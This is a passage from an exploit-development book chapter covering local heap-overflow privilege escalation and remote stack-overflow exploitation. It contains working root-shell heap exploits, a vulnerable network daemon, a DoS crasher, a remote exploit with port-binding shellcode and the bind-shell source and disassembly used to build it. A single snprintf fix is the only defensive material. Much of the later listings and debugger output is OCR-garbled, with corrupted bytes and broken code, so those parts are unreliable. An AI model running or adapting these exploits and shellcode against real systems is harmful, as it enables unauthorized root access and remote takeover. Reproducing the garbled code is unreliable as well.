# ls -la ./heap_vuln
-rwsr-sr-x 1 root root 14222 Apr 20 04:18 ./heap_vuln
# su nobody
sh-2.04$ id
uid=99(nobody) gid=99(nobody) groups=99(nobody)
sh-2.04$ ./expl_heap1
(the output is skipped)
sh-2.04# id
uid=0(root) gid=0(root) groups=99(nobody)
sh-2.04#


The operation of the second exploit is checked in the same way.
Listing 13.33. Placing the shellcode in the vulnerable buffer (expl_heap1.c)


#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define FREE_GOT_ADDRESS 0x080496ec
#define RET (0x080497b8 + 8)
#define GARBAGE 0x12345678

char shellcode[] =
    "\xeb\x0aXXXXXXXXXX"                   /* jmp over the bytes damaged by unlink() */
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"     /* setuid(0) */
    "\x31\xc0\x31\xdb\xb0\x2e\xcd\x80"     /* setgid(0) */
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0"     /* execve("/bin/sh", ...) */
    "\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
    "\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff"
    "/bin/sh";

int main()
{
    char buf[300];
    char *p;

    p = buf;

    /* two filler words at the start of buffer a */
    *((void **)p) = (void *)(GARBAGE);
    p += 4;
    *((void **)p) = (void *)(GARBAGE);
    p += 4;

    memcpy(p, shellcode, strlen(shellcode));
    p += strlen(shellcode);

    memset(p, 'A', 200 - 2 * 4 - strlen(shellcode));
    p += (200 - 2 * 4 - strlen(shellcode));

    /* fake chunk header: prev_size with PREV_INUSE cleared, size = -4 */
    *((size_t *)p) = (size_t)(GARBAGE & ~0x1);
    p += 4;
    *((size_t *)p) = (size_t)(-4);
    p += 4;

    /* fd and bk of the fake chunk */
    *((void **)p) = (void *)(FREE_GOT_ADDRESS - 12);
    p += 4;
    *((void **)p) = (void *)(RET);
    p += 4;

    *p = '\0';
    execl("./heap_vuln", "heap_vuln", buf, (char *)NULL);

    return 0;
}


Listing 13.34. Placing the shellcode in an environment variable (expl_heap2.c)


#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define FREE_GOT_ADDRESS 0x080496ec
#define GARBAGE 0x12345678

char shellcode[] =
    "\xeb\x0aXXXXXXXXXX"                   /* jmp over the bytes damaged by unlink() */
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"     /* setuid(0) */
    "\x31\xc0\x31\xdb\xb0\x2e\xcd\x80"     /* setgid(0) */
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0"     /* execve("/bin/sh", ...) */
    "\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
    "\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff"
    "/bin/sh";

int main()
{
    char *env[] = {shellcode, NULL};
    char buf[300];
    long ret;
    char *p;

    /* the shellcode is the only environment string, so (on the classic 32-bit
       layout where the stack ends at 0xc0000000) it lies just below the top */
    ret = 0xc0000000 - 6 - strlen(shellcode) - strlen("./heap_vuln");
    p = buf;

    memset(p, 'A', 200);
    p += 200;

    *((size_t *)p) = (size_t)(GARBAGE & ~0x1);
    p += 4;
    *((size_t *)p) = (size_t)(-4);
    p += 4;
    *((void **)p) = (void *)(FREE_GOT_ADDRESS - 12);
    p += 4;
    *((void **)p) = (void *)(ret);
    p += 4;

    *p = '\0';

    execle("./heap_vuln", "heap_vuln", buf, NULL, env);

    return 0;
}

The source codes for all programs in this section can be found in the /PART III/ 
Chapter 13/13.4 directory on the accompanying CD-ROM. 
The internal construction of remote exploits is significantly different from that of local
exploits, but their general operating principle is similar: a string containing shellcode is
sent to a vulnerable server. The string causes a buffer overflow, which results in the
shellcode being executed. The shellcode opens access to the server's command line on a
certain port or provides access to the vulnerable server in some other way.

The source codes for all programs in this chapter can be found in the /PART III/Chapter 14
directory on the accompanying CD-ROM.


14.1. Vulnerable Service Example 


A remote service, or daemon, may have the same main types of vulnerabilities that were
considered in the chapter on local exploits (Chapter 13): stack, BSS, or heap buffer overflows
and format string errors. I only consider developing remote exploits for the stack buffer
overflow error. This example and those considered for local exploits should allow you to
construct remote exploits for the other types of vulnerabilities. Listing 14.1 shows an
example of a vulnerable service.


Listing 14.1. Vulnerable service


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>

#define BUFFER_SIZE 1000
#define NAME_SIZE 2000

void hello_client(int sock)
{
    char buf[BUFFER_SIZE];
    char name[NAME_SIZE];
    int nbytes;

    strcpy(buf, "Enter your name: ");
    send(sock, buf, strlen(buf), 0);

    if ((nbytes = recv(sock, name, sizeof(name), 0)) > 0) {
        name[nbytes - 1] = '\0';
        /* no bounds check: name may be up to 2,000 bytes, buf holds 1,000 */
        sprintf(buf, "Hello %s\r\n", name);
        send(sock, buf, strlen(buf), 0);
    }
}

int main(int argc, char *argv[])
{
    int sd;
    int clisd;
    struct sockaddr_in servaddr;

    if (argc != 2) {
        printf("Usage: %s <port>\n", argv[0]);
        exit(-1);
    }

    if ((sd = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
        perror("socket() failed");
        exit(-1);
    }

    bzero(&servaddr, sizeof(servaddr));
    servaddr.sin_family = AF_INET;
    servaddr.sin_addr.s_addr = htonl(INADDR_ANY);
    servaddr.sin_port = htons(atoi(argv[1]));

    if (bind(sd, (struct sockaddr *)&servaddr, sizeof(servaddr)) != 0) {
        perror("bind() failed");
        exit(-1);
    }

    if (listen(sd, 30) != 0) {
        perror("listen() failed");
        exit(-1);
    }

    for (;;) {
        if ((clisd = accept(sd, NULL, NULL)) < 0) {
            perror("accept() failed");
            exit(-1);
        }

        hello_client(clisd);
        close(clisd);
    }

    return 0;
}





Compile and run the service:

# gcc vulnserver.c -o vulnserver
# ./vulnserver 7777

The number 7777 is the port used by the service. If the service is run with root privileges,
any port can be used. A nonprivileged user can only use ports numbered 1,024 and above.

Now, you can connect to the vulnerable service using the standard telnet client:

# telnet 127.0.0.1 7777
Trying 127.0.0.1...
Connected to localhost (127.0.0.1).
Escape character is '^]'.
Enter your name: Sklyaroff
Hello Sklyaroff
Connection closed by foreign host.
#

The service simply requests a name and sends a greeting in reply.


14.2. DoS Exploit 


In the source code of the service, a 1,000-byte buffer named buf is defined. The sprintf()
function copies the entered name into this buffer, after the "Hello " prefix; the name,
however, can be up to 2,000 bytes long. Consequently, if a client enters a name longer than
1,000 characters, the buf buffer overflows when sprintf() copies the name into it.
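The defect is easy to avoid with snprintf(), which never writes more than the given number of bytes and returns the length the complete string would have had. The sketch below shows how the greeting in hello_client() could be built safely; build_greeting() is a hypothetical helper, and BUFFER_SIZE mirrors the constant in Listing 14.1:

```c
#include <stdio.h>
#include <string.h>

#define BUFFER_SIZE 1000   /* same size as buf in Listing 14.1 */

/* Hypothetical helper: build "Hello <name>\r\n" in out (outsize bytes)
   without overflowing it. Returns 1 if the whole greeting fit, 0 if it
   was truncated or an encoding error occurred. */
int build_greeting(char *out, size_t outsize, const char *name)
{
    int n = snprintf(out, outsize, "Hello %s\r\n", name);
    return n >= 0 && (size_t)n < outsize;
}
```

In hello_client(), the sprintf() call would become build_greeting(buf, sizeof(buf), name); an overlong name is then truncated to fit the 1,000-byte buffer instead of overwriting the stack.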

Because entering 2,000 characters manually is tedious, delegate it to a DoS exploit, which
will send a string of a specified length to the service. The source code for such an exploit
is shown in Listing 14.2. In the command line, the DoS exploit must be passed the IP address
of the server, the port of the vulnerable service, and the number of bytes to send (i.e., the
length of the string). The DoS exploit sends a string of the specified length consisting of
A characters only (code 0x41).





Listing 14.2. DoS exploit (dos.c)


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>

int main(int argc, char *argv[])
{
    int sd;
    int nbytes;
    char *buf;
    struct sockaddr_in servaddr;

    if (argc != 4) {
        printf("Usage : dos <ip> <port> <number of bytes>\n\n");
        exit(-1);
    }

    nbytes = atoi(argv[3]);
    if ((buf = (char *)malloc(nbytes)) == NULL) {
        perror("malloc() failed");
        exit(-1);
    }

    memset(&servaddr, 0, sizeof(servaddr));
    servaddr.sin_family = AF_INET;
    servaddr.sin_addr.s_addr = inet_addr(argv[1]);
    servaddr.sin_port = htons(atoi(argv[2]));

    if ((sd = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
        perror("socket() failed");
        exit(-1);
    }

    memset(buf, 'A', nbytes);

    if (connect(sd, (struct sockaddr *)&servaddr, sizeof(servaddr)) != 0) {
        perror("connect() failed");
        exit(-1);
    }

    /* buf is not NUL-terminated, so send exactly nbytes bytes */
    send(sd, buf, nbytes, 0);

    free(buf);
    close(sd);

    return 0;
}

Suppose that the vulnerable service is sent 1,500 bytes:

# gcc dos.c -o dos
# ./dos
Usage : dos <ip> <port> <number of bytes>

# ./dos 127.0.0.1 7777 1500

The vulnerable service will terminate abnormally and issue the Segmentation fault (core
dumped) message.
14.3. Constructing a Remote Exploit


Because the buffer in the vulnerable service is defined in the hello_client() function, the
return address of this function is stored in the stack near the buffer. Consequently, this
return address can be overwritten to pass execution control to a shellcode.

To determine the return address for the hello_client() function, load the service in GDB:

# gdb -q ./vulnserver
(gdb) r 30000
Starting program: /home/ ./vulnserver 30000

The service was started on port 30000. Run the DoS exploit:

# ./dos 127.0.0.1 30000 2000

It results in the following output from the debugger:

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb)

The return address in the stack was overwritten, which loaded the value 0x41414141 into
the EIP register. The program jumped to this address and crashed. The postcrash contents of
the registers are the following:

(gdb) x $esp
0xbffff9d0: 0x41414141
(gdb) i r ebp eip
ebp            0x41414141       0x41414141
eip            0x41414141       0x41414141
(gdb)


Now, view the contents of the buffer: 


(qdb) x/200bx Sesp-200 

Oxbfttfr908: Ox41 Ox4l Ox41 Oxd4l Ox41 Ox41 Ox41 0x41 
OxbfffFf910: Ox41 Ox41 Ox41 Ox41 0x41 Ox41 Ox41 Ox41 
Oxbfftrfsle: Oxdl Ox4] Ox4l Ox4dl Ox4dl Ox4dl1 Ox4l1 0x41 
OxbffFF920: Ox41 Ox4l Ox41 Ox41 Ox41l Oxdl Ox41 0x41 
OxbEfftt926: Ox41 Ox4dl Ox4dl Ox41 Ox41 Ox4l1 Ox41 0x41 
OxbfffFf930: Ox41 0x41 0x41 Ox4l 0x41 Ox41 Ox41 0x41 
Oxb£ffffS938: Ox4l Ox41l Ox4]1 Ox4l1 Ox4l Ox4l Ox4l 0x41 
OxbffFft940: Ox41 On41 Ox41 Ox41 0x41 Ox4l1 Ox4l Ox41 
OxbEfEE946: Oneal Ox4l Ox4al Ox4dl Ox4dl Oxdl Ox4l Ox4l 
Oxbffff950: Ox41 Ox4l Ox4l1 0x41 Ox4l1 Ox41 Ox4l1 0x41 
Oxbfftt95s8: Ox4]1 Ox41 Ox41 Ox41 Ox41 Ox41 Ox41 Ox41 
Oxbfffft9e0: Ox4]1 Ox41 Ox4l Ox41 Oxdl Ox41 Ox41 0x41 
Oxbffff968: Ox4l Ox41 Ox4l1 Ox4l Ox41 Ox4l1 Ox4l 0x41 
OmbEffEST7O: Ox4l Ox4l Ona] Oxdl Oxdl Ox4d1 Oxdl1 Oxd4l1 
OxbffFfC978: Ox4l Ox41 Ox41 Ox4l Ox41 Ox41 Oxd4l Ox41 
Oxbftfftft98O0: Ox4l1 Oxdl Oxdl Ox4l Ox4l1 Ox41 Ox4l 0x41 
Oxbf£fEf98e: Ox4dl Ox41 Ox4l Ox4l Ox41 Ox41 Ox4l Ox41 
OxbtftE990: Ox4dl Ox4dl Ox4dl Ox4l Ox4dl Ox41 Ox4l Ox4dl 
Oxb£fFf998: Oxdl Ox41 Ox41 Ox41 0x41 Ox41 Ox4l 0x41 
OxbffEf9a0; Ox4l Ox4l Ox4l Ox4l Ox41 Ox4l1 Ox4l 0x41 
Oxbfftft9as: Ox4dl] Oxdl Ox4l Ox4dl1 Ox4dl Oxdl Oxdl Ox4l 
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OxbEfttf9bO: Ox4l Ox4l Ox41 Ox4l1 Ox41 Ox41 0x41 Ox41 
Oxbffff6be: Ox4l1 Ox41 Ox41 Ox41 Ox41 Ox41 Ox41 Ox41 
OxbEfEF6cO: Oxdl Ox41 Ox4al Ox41 Ox41 Ox41 Ox4l Ox4dl 
---Type <return> to continue, or q <return> to quit--- 


Any of these addresses can be used as the return address for the exploit, but I recommend
using an address roughly in the middle of the buffer.

The exploit uses port-binding shellcode, which will open access to a shell on a port of the
vulnerable server. Programming port-binding and other types of remote shellcodes is
considered in Section 14.4.

The exploit must send a string longer than 1,000 bytes; therefore, a 1,050-byte buffer is
prepared, which should be enough to overwrite the return address. The buffer is filled with
NOP instructions (code 0x90), the shellcode is placed after a long run of NOPs so that it ends
just before the 1,000th byte, and the return address is repeated at the end of the buffer.
The string passed to the vulnerable program will look like the following:

NOP NOP NOP ... Shellcode ... RET RET RET


The source code for this remote exploit is shown in Listing 14.3. 

You can check the exploit's operation by running it on the local machine. First run the
vulnerable service in a terminal window:

# gcc vulnserver.c -o vulnserver
# ./vulnserver 60000

Then open a new terminal window and run the exploit in it:

# gcc expl_remote.c -o expl_remote
# ./expl_remote
Usage: ./expl_remote <target> <port> <ret>
# ./expl_remote 127.0.0.1 60000 0xbffff97d

If the exploit executes successfully, the shellcode will open port 30464, to which you can
connect using the netcat utility:

# nc 127.0.0.1 30464
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)





Listing 14.3. A remote exploit (expl_remote.c) 





finclude 
#include 
#include 
#include 
Finclude 
finclude 
finclude 


<stdio.h> 
<Stdlib.h> 
<sys/types.h> 
<sys/socket.h> 
<netdb.h> 
<netinet/in.h> 
<string.h> 


char shellcode[] = 


/* main: 


/ 


"\xeb\x72" /* jmp line */ 


** start: 


at 


"\x5e" /* popl tesi */ 





/* socket (AF INET, 


ye 31\xco" {* 
"\xe9\x46\x10" {* 
"\xdo" j* 
 WHeS\xc3" ‘iia 
"\x89\ed6\x0c" /* 
40" je 
"\s89\x46\x08" /* 
"\eAd\x4de\xoa" ;= 
 xbO\x66" {* 
"\xcd\x80" /* 
/* bind(sd, (struct sockaddr 
"\x43" /* 
"\xc6\x46\x10\x10" j* 
"\x66\x89\x5e\x14" /* 
"\ x86 \x46\x08" {* 
" We31\xco" /* 
"WBS \xc2" /* 
"\HaO\ed6\x18" i* 
" \xbO\x77" /* 
"\HO6\xXO9\\x46\x16" f* 
"\e@d\x4e\x14" /* 
"\x89\x4e\x0c" /* 
"\x8d\x4de\x08" f* 
"\xbO\*x66" {* 
"\xcd \x80" /* 
/* listen(sd, 1) */ 
"\HeO\e5e\x0c" j* 
x43" /* 
wWxd3" j* 
"\xbO\x66" /* 
"\ecd\x80" i* 
/* accept(sd, NULL, 0) */ 
"\HES'\e56\x00" {* 
1x8 9\x56\x10" /* 
"\xb0\x66" i* 
"\xd3" /* 
*\xcd\x80" /* 
/* dup2(cli, 0) */ 
"\86\xo3" /* 
 WxbO\x3i" /* 
Wie31\xes" ix 
"\acd\x80" rik 
f* dup2(cli, 1) */ 
TT WebO'*\13£" /* 
"\x41" ;* 
"\ecd\x8o" /* 


/* dup2(cli, 2) */ 
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SOCK STREAM, 0) */ 


$eax, teax */ 

teax, Oxl0(%esi) */ 
teax */ 

teax, tebx */ 

teax, OxOc(%esi) */ 
teax */ 

teax, OxO8(%esi) *,/ 
leal OxO08(%esi), tecx */ 
movb $0x66, tal */ 

int $0x80 */ 
*)aservaddr, sizeot(servaddr)) */ 


xorl 
mov 
incl 
movi 
movi 
incl 
mow) 


incl tebx */ 
movb $0x10, Oxl0(%esi) */ 
movw thx, Oxl4(%esi) */ 
movb Sal, Ox08(%esi) */ 
xorl teax, teax */ 
movl $eax, %edx */ 
movl teax, OxlB(t%esi) */ 
movb $Ox77, tal */ 
movw %ax, Oxlé(tesi}) */ 
leal 0x14(%esi), tecx */ 
movl tecx, OxOc(%esi} */ 
leal OxO08(tesi), tecx */ 
movb $0x66, tal */ 

int $0x80 */ 
movl tebx, Ox0c(%esi) */ 


incl tebx */ 
incl tebx */ 
movb 50x66, tal */ 
int $080 */ 


movl tedu, OxOc(tesi) */ 
movl tedx, Ox10(%esi} */ 
movb 50x66, tal */ 

incl tebx */ 

int 50x80 */ 


xchgb Sal, tbl */ 


* movb $0x3f, tal */ 


xorl $ecx, tecx */ 
int $0x80 */ 


movb $0x3f, tal */ 
incl tecx */ 
int $0x80 */ 
"\xbO\x3£" /* movb $0x3f, tal */ 
sd" /* incl tecx */ 
"\xod\x80" /* int §$0x80 */ 


/* execl() */ 


"\x88\x56\x07" /* movb dl, Ox07(%esi) */ 
"\HB9\e76\x0c" /* movl tesi, Ox0c(t%esi) */ 
\x87\xta" /* uchgl tesi, tebx */ 
"\x8d\x4b\x0c" /* leal OxOc(%ebx), tecx */ 
"\xbO\x0b" /* movb $0x0b, tal */ 
"\xcd\x80" /* int S0xE0 */ 

/* line: */ 


"\WHeb\eBO\etft\eMeEf\xfi"™ /* call start */ 
"/bin/sh"; 


int main(int argc, char *argv[]} 


{ 


char buf[1050); 

leng ret; 

char *ptr; 

long *addr ptr; 

int sd, i; 

struct hostent *hp; 

struct sockaddr in remote; 


if(arge != 4) { 
fprintf(stderr, "Usage: ts <target> <port> <ret>\n", argv([0]); 
exit (-1); 

} 


ret = strtoul(argv[3], NULL, 16); 


memset (buf, 0x90, 1050); 
memcpy (buf + LOOL - sizeof(shellcode), shellcode, sizeof(shellcode)); 
buf[(1000] = Ox90; 
for(i = 1002; 1 < 1046; i += 4) { 
* ({int *) &but[i}) = ret; 
} 
buf[1050] = Ox0; 


if ( (hp = gethostbyname(argv[1])) == NULL) { 
herror("gethostbyname() failed"); 
exit (-1); 


} 


if ( (sd = socket (PF_INET, SOCK_STREAM, 0)) < 0) { 
perror ("socket () failed"); 
exit(-1); 

} 


remote.sin_family = AF_INET; 
remote.sin_addr = *((struct in_addr *)hp->h_addr); 
remote.sin port = htons(atoi(argv[2])); 


if (connectisd, (struct sockaddr *)&remote, sizeof(remote)) == -1) { 
perror("connect() failed"); 


1 


close (sd}; 
exit(-1L); 
} 


send(sd, buf, sizeoft(buf), 0); 


close (sd); 





14.4. Remote Shellcodes 


Remote shellcodes differ significantly from shellcodes used in local exploits. There are numerous types of remote shellcodes; I consider all the main ones.


14.4.1. Port-Binding Shellcode 

This type of shellcode is in essence a bind shell backdoor, which was considered in Chapter 11. 
A port-binding shellcode simply opens access to a command shell at a certain port. The source 
code for this shellcode is shown in Listing 14.4. 





Listing 14.4. Port-binding shellcode (bindport.c) 





#include <stdio.h> 
finclude <netinet/in.h> 
f#finclude <sys/types.h> 
#include <sys/socket.h> 
f#include <unistd.h> 


int sd, cli; 
struct sockaddr in servaddr; 


int main({} 

{ 
servaddr.sin family = AF INET; 
servaddr.sin_addr.s addr = INADDR_ANY; 
servaddr.sin port = htons (30464); 
sd = socket (AF INET, SOCK STREAM, 0); 
bind(sd, (struct sockaddr *)&servaddr, sizeof (servaddr)); 
listen(sd, 1); 
cli. = accept(sd, NULL, W); 
dup2 (cli, QO); 
dup2 (cli, 1); 
dup2 (cli, 2); 
exec] ("/bin/sh", "sh", NULL); 
Compile and disassemble the program:
# gcc bindport.c -o bindport -g --static 
# gdb -q ./bindport 


First, disassemble the main() function (Listing 14.5). 


Listing 14.5. The disassembled main() function 





(qdb) disassemble main 

Dump of assembler code for function main: 

OxB048le0 <main>: push %ebp 

Ox8048lel <main + 1>: mov ‘esp, tebp 
OxB048le3 <main + 3>: sub $0x8, tesp 
OxBO0481£5 <main + 21>: movw $0x2, Ox809f9a0 
Ox80481lfe <main + 30>: movi 50x0, Ox809f9a4 
Ox8048208 <main + 40>; sub $OQxc, tesp 
OxB04820b <main + 43>: push $0x7700 
Ox68048210 <main + 48>: call Ox€04d350 <htons> 
Ox8049215 <main Sa add 50x10, tesp 
OxB048218 <main + 56>: mow $eax, Feax 
OxBO4821la <main 58>: mov ‘ean, eax 
OxBOde21c <main 60>: mov tax, Oxb09f9a2 
OxBO048222 <main 66>: sub 50x4, tesp 
Ox8048225 <main + 69>: push $0x0 

OxB048227 <main + 71>: push $0x1 

OxBO48229 <main + 73>: push $0x2 

OxnB04622b <main + 75>: call Ox604d330 <__socket> 
Ox8048230 <main + 80>: add $0x10, tesp 
OxBO48233 <main 83>: mow ‘eax, *eax 
Ox8048235 <main B5>: mow feax, Oxb09f9b4 
Ox804823a <main + 90>: sub s0x4, tesp 
OxBO4823d <main + 93>: push $0x10 

OxBO4823E <main + 95>; push $0x809f9a0 
OxBOd48244 <main 100>: pushl Oxe8o9fSb4 
Oxb04824a <main 106>: call OxBOdd2f0 <bind> 
Ox604824f <main + 111>: add 30x10, tesp 
Ox8048252 <main 114>; sub $0x8, tesp 
Ox6048255 <main 117>: push S0x1 

Ox8048257 <main 119>: pushl Oxeoofop4 
OxBO4825d <main 125>: call 0x8040d310 <listen> 
Ox8048262 <main + 130>: add $0x10, tesp 
OxBO46265 <main 133>; sub S0x4, tesp 
OxB048268 <main + 136>: push $0x0 

Ox804826a <main + 138>: push $0x0 

OxBO4826c <main + 140>: pushl Oxs09f9b4 
OxB048272 <main + 146>: call OxéO04d2d0 <_ libec accept> 
OxBO48277 <main 151>: add 70x10, esp 
Ox804827a <main 154>: mov eax, %eax 
Ox804827c <main 156>: mow teax, OxB09FSb0 
Ox804828] <main 161>; sub SO0x8, tesp 
OxB048284 <main 164>: push $0x0 

Ox6048286 <main 166>: pushl OxsO09f9b0 


OxB04829e¢ <main + 1l?2>: call Oxb04dd190 <_ dup2> 
Ox8046291 <main + 177>: add 50x10, %esp 
Ox8046294 <main + 180>: sub 50x$, tesp 
Ox8048297 <main + 1863>: push $0x1 

Ox8048299 <main + 185>: pushl Oxs809fSb0 
OxBO4829f <main + 191>: eall 0x804d190 <__dup2> 
Ox80482a4 <main + 196>: add S0x10, %esp 
OxB0482a7 <main + 199>: sub $0x8, %tesp 
Ox80482aa <main + 202>: push $0xzZ 

Ox80482ac <main + 204>: pushl Ox809f9b0 
Ox80482b2 <main + 210>: call Ox804d190 <_ dup2> 
Ox80482b7 <main + 215>: add $0x10, %esp 
Ox80482ba <main + 218>: sub $0x4, %esp 
Ox80482bd <main + 221>: push 30x 

OxB0482bf <main + 223>: push $0x808e528 
Ox80482c4 <main + 228>: push 30x#0te52b 
Ox80482c9 <main + 233>: call OxbOdecdO0 <execl> 
Ox80482ce <main + 238>: add 50x10, *esp 
Ox60482d1 <main + 241>: leave 

Ox80482d2 <main + 242>: ret 


End of assembler dump. 
(qd) 


Next, disassemble the socket(), bind(), listen(), accept(), and dup2() functions
(Listings 14.6 through 14.10).








Listing 14.6. The disassembled socket() function 





(qdb) disassemble socket 
Dump of assembler code for function socket: 


Ox804d330 <_ socket>: mov tebx, tedx 

OxB04d332 <__ socket + 2Z>: mov 90x66, teax 

Ox804d337 <__ socket + 7>: mov 0x1, tebx 

Ox804d33c <_ socket + 12>; lea Oxd(%esp, 1), tecx 

Ox804d340 <__ socket + 16>: int S0x80 

Ox604d0342 <_ socket + 18>: mov tedx, tebx 

OxB04d344 <_ socket + 20>: cmp sOxffffffs3, teax 

Ox804d347 <__ socket + 23>: jae Ox8034470 <__ syscall error> 
Ox604d34d <_ socket + 29>: ret 


End of assembler dump. 
(qd) 





Listing 14.7. The disassembled bind() function 


(qdb) disassemble bind 

Dump of assembler code for function bind: 
Ox804d2f0 <bind>: mov $ebx, %edx 
Ox804d2f2 <bind + 2>: mov SOx66, %eax 
Ox804d2£7 <bind + 7>: mov SOx2, %ebx 
Ox804dd2fc <bind + 12>: lea Ox4 (%esp, 1), tecx 
Ox804d300 <bind + 16>: int 50x80 

Ox804d302 <bind + 18>: mov $edx, ‘tebx 


Ox804d304 <bind + 20>: cmp 
Ox804da307 <bind + 23>: jae 
Ox804d30d <bind + 29>: ret 
End of assembler dump. 
(qdb} 


SOxffffff*S83, eax 
0x8054470 <__ syscall_error> 





Listing 14.8. The disassembled listen() function 


(qdb) disassemble listen 





Dump of assembler code for function listen: 


Ox804d310 <listen>: 


OxB0dd312 <listen + 2>: 

OxBO4Gd3sl7 <lListen + T>: 

OxB04d3le <Listen + 12>: 
Ox804d320 <listen + 16>: 
OxB0d4d322 <listen + 18>: 
OMBOUGd324 <lListen + 20>: 
OxBOdd327 <lListen + 23>: 
OxB04d32d <listen + 29>: 


End of assembler dump. 
{qdb) 








(gdb) disassemble accept 


mov 
mow 
mov 
lea 
int 
mov 
cmp 
jae 
ret 


Listing 14.9. The disassembled accept() function 


Dump of assembler code for function 
Ox8O04d2d0 <_ libc_accept>: 
OxBO0dd2d2 <_ libc_accept + 2>: 
OxB04d2d7 <_ libc_accept + 7>: 
Ox8O0dd2dce <  libec accept + 12>: 
OxBbO4d2e0 < libc accept + 16>: 
Ox804d2e2 <_ libe accept + 18>: 
OxB04d2e4 <_ libc accept + 20>: 
OxB0ddZe4 <_ libe accept + 23>: 
Ox804d2ed <_ libec accept + 29>; 


End of assembler dump. 
(gdb) 


$ebx, %edx 

SOx66, teax 

SOx4, %ebx 

Ox4 (tesp, 1), tecx 

50x60 

tedx, %ebx 

SOxftftffrtss, teax 

Ox8054470 <_ syscall error> 


_ jibe accept: 
mov #ebx, %edx 
mov 20x66, ‘eax 
TOV 50x5, %tebx 
lea Ox4(%esp, 1), tecx 
int S0x80 
mov $edx, tebx 
cmp SOxELELLESS, teax 
jae Ox8054470 <__ syscall _error> 
ret 





Listing 14.10. The disassembled dup2() function 


(qdo) disassemble dup2 


Dump of assembler code for function 


OxBO4d190 <_ dupé>: 


OxB04d192 <_ dupe + 2>; 

OxB0dd196 <_ dupZ + 6>: 

OxB04d19a <_ dup2 + 10>: 
Ox804d19£ < dup? + 15>: 
OxBOd4dlal <_ dup2 + 17>: 
Ox804dla3 < dup? + 19>: 
Ox804dla8 <__dup2 + 24>: 


Ox804dlae <_ dup2 + 30>: 
End of assembler dump. 
(gdb) 


mov 
moy 
moy 
mov 
mov 





__ dupe: 


tebx, %tedx 

Ox8(%esp, 1), *tecx 

Ox4 (esp, 1), %ebx 

2Ox3f, teax 

S0x80 

$edx, Sebx 

SOxfffffO01, teax 

Ox6054470 <_ syscall error> 
Proceeding as in Section 13.1.3 and using the information from the disassembled functions, prepare a preliminary shellcode in assembler (Listing 14.11).





Listing 14.11. A preliminary remote shellcode 





int main() 
{ 
asm ("jmp line 
start: 
popl tesi 


/* socket (AF INET, SOCK STREAM, 0) */ 

xorl teax, teax 

movl *%eax, Ox10(%esi) 
incl *eax 

movl teax, Sebx 

movl teax, OxOc(%esi) 
incl *eax 

movil teax, 0x08 (%esi) 
leal OxO8(S%esi), %ecx 
movb $0x66, tal 

int 30x80 


/* bind(sd, [struct sockaddr *)&éservaddr, sizeof(servaddr)} */ 
incl tebx 
movb $0x10, Ox10(#esi) 
movw tbx, 0x14 (%esi) 
movb tal, Ox08(%esi) 
xorl teax, teax 
movl %eax, *tedx 
movl teax, Oxlé@($esi) 
movb SOx77, *al 
moww tax, Oxl6(%esi) 
leal 0x14 (%#es5i), %ecx 
movl %ecx, Ox0c(%esi) 
leal Ox08(%esi), %ecx 
movb $0x66, tal 
int $0«80 


/* listen(sd, 1) */ 
movil tebx, OxOc(%esi) 
incl tebx 
incl tebx 
movb $0x66, tal 
int 30x80 


/* accept(sd, NULL, 0) */ 
movl tedx, Ox0c(*esi) 
movil tedx, Ox10(%esi) 
movb SOx66, tal 
incl tebx 
int $0680 


/* dup2(cli, 0) */ 
xchgb %al, %bl 
mowb SOx3f, tal 
xorl tecx, tecx 
int 50x80 


/* dup2(eli, 1) */ 
movb $Ox3f, tal 
incl tecx 
int $0x80 


/* dup2{cli, 2) */ 
movb $0x3f, tal 
incl %ecx 
int $080 


{* execl({) */ 
movwb tdl1, OxO07(%esi1) 
movl tesi, Ox0c(%esi) 
xchql esi, tebx 
leal OxOc(%ebx), %ecx 
movb $0x0b, tal 


int $080 
line: 
call start 
~string \"/bin/sh\" 
"he 





Compile the source code using the following command: 
# gcc tempshell.c -o tempshell 

Now, dump its hexadecimal code: 

# objdump -D ./tempshell


Listing 14.12 shows the part of the dump of interest to us. This is how the hexadecimal 
form of the shellcode used in the remote exploit (Listing 14.3) was obtained. 





Listing 14.12. The hexadecimal values of the remote shellcode 





08048430 <main>: 


8048430: 55 push Sebp 
BO48431: a9 e5 mov tesp, tebp 
BO48433: eb 72 jmp 80484a7 <line> 


08048435 <start>: 


#048435: oe pop $esi 

8048436: 31 cO xOr %eax, teax 
8048438: 89 46 10 mov teax, Ox10(%es1) 
B04843b: 40 inc $eax 


B04b43c: 89 ¢3 mov #ean, teDH 


B04843e: 89 46 
8048441: 40 

8048442: 89 46 
80486445: Sd 4de 
BO48448: bO 66 
BO04844a: cd 80 
804844c: 43 

BO04844d: co 46 
8048451: 66 89 
8048455: BB 46 
B048458: 31 ¢0 
BO4845a: B9 c2 
B04845ec: 69 46 
BO4845F: bO 77 
BO04e8461: 66 89 
8048465: Bd 4e 
BO48468: #9 de 
804846b: Bd 4e 
BO4846e: bO 66 
BO4e8470: ed 80 
BO048472: 89 5Se 
BO48475: 43 

8048476: 43 

B048477: bO 66 
e046479: ed 80 
BO4647b: Bo 56 
e04847e: 89 56 
B048461: bO 66 
SO48483: 43 

8048484: ed 80 
BO48486: 86 c3 
BOdSe4Bba: bOQ 3f 
BO04848a: 31 c9 
BO4848c: ed 80 
